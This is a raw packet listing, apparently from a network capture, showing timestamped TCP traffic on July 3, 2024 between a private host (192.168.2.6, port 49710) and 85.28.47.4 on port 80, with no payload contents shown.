Jul 3, 2024 18:08:38.748258114 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.748265028 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.748275042 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.748286009 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.748286963 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.748296976 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.748310089 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.748316050 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.748330116 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.748347998 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.748821974 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.748832941 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.748842955 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.748852968 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.748868942 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.748868942 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.748881102 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.748891115 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.748892069 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.748904943 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.748915911 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.748918056 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.748929024 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.748929977 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.748940945 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.748950958 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.748954058 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.748961926 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.748972893 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.748980999 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.748985052 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.748995066 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.748999119 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.749006987 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.749015093 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.749017954 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.749027967 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.749038935 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.749041080 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.749049902 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.749062061 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.749068975 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.749083996 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.749109030 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.749577045 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.749588966 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.749599934 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.749609947 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.749620914 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.749629974 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.749634027 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.749671936 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.749780893 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.750150919 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.834204912 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.834229946 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.834240913 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.834347010 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.834347963 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.834358931 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.834372997 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.834383965 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.834394932 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.834525108 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.834525108 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.834554911 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.834564924 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.834575891 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.834585905 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.834598064 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.834599972 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.834609032 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.834614992 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.834620953 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.834631920 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.834644079 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.834645033 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.834659100 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.834692955 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.834831953 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.834849119 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.834866047 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.834888935 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.834923983 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.834935904 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.834947109 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.834969997 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.834995031 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.835037947 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.835053921 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.835064888 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.835077047 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.835088015 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.835091114 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.835098028 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.835108995 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.835115910 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.835131884 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.835155010 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.835376024 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.835387945 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.835397959 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.835408926 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.835417032 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.835418940 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.835429907 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.835439920 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.835441113 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.835452080 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.835457087 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.835463047 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.835474968 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.835479021 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.835490942 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.835500002 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.835500956 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.835515022 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.835527897 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.835545063 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.835808992 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.835819960 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.835832119 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.835841894 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.835853100 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.835853100 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.835877895 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.835892916 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.883764029 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.896507025 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.069670916 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.069690943 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.069703102 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.069756031 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.069797039 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.069808006 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.069818020 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.069828987 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.069917917 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.069917917 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.069917917 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.069917917 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.069962025 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.069972992 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.069983006 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.069993973 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.069998980 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.070003986 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.070018053 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.070053101 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.070205927 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.070215940 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.070225954 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.070236921 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.070245028 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.070254087 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.070265055 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.070267916 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.070276022 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.070286036 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.070288897 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.070297956 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.070319891 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.070348024 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.070476055 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.070487976 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.070518017 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.070532084 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.070677996 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.070688009 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.070698977 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.070714951 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.070715904 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.070725918 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.070736885 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.070743084 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.070746899 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.070758104 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.070769072 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.070771933 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.070779085 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.070936918 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.070946932 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.070959091 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.070960045 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.070960045 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.070976973 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.070981979 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.070987940 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.071002960 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.071031094 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.071048975 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.071060896 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.071070910 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.071084976 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.071093082 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.071095943 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.071106911 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.071108103 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.071120024 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.071136951 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.071162939 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.071429968 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.071439981 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.071450949 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.071460962 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.071470976 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.071486950 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.071511984 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.071681023 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.071692944 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.071708918 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.071719885 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.071722031 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.071729898 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.071741104 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.071743965 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.071752071 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.071763039 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.071774006 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.071775913 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.071784019 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.071794987 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.071799994 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.071805000 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.071815014 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.071819067 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.071829081 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.071840048 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.071850061 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.071854115 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.071854115 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.071877003 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.071901083 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.072376966 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.072387934 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.072405100 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.072416067 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.072422981 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.072427034 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.072438002 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.072447062 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.072448015 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.072458982 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.072468996 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.072474003 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.072484970 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.072495937 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.072498083 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.072506905 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.072518110 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.072520018 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.072527885 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.072537899 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.072539091 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.072550058 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.072561026 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.072562933 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.072571993 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.072582006 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.072585106 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.072608948 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.072628021 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.073165894 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.073177099 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.073188066 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.073199034 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.073210001 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.073211908 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.073220015 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.073237896 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.073247910 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.073260069 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.073263884 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.073270082 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.073282957 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.073286057 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.073297024 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.073302984 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.073308945 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.073311090 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.073319912 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.073331118 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.073337078 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.073340893 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.073353052 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.073363066 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.073367119 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.073375940 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.073385954 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.073389053 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.073396921 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.073404074 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.073407888 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.073419094 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.073431969 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.073452950 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.073983908 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.073995113 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.074006081 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.074017048 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.074026108 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.074031115 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.074054003 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.074070930 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.158281088 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.158322096 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.158333063 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.158344030 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.158375025 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.158375025 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.158411026 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.158422947 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.158433914 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.158447981 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.158448935 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.158469915 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.158485889 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.158617973 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.158628941 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.158639908 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.158652067 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.158662081 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.158673048 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.158684015 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.158777952 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.158858061 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.158869028 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.158879995 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.158890009 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.158900976 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.158901930 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.158911943 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.158922911 CEST	80	49710	85.28.47.4	192.168.2.6
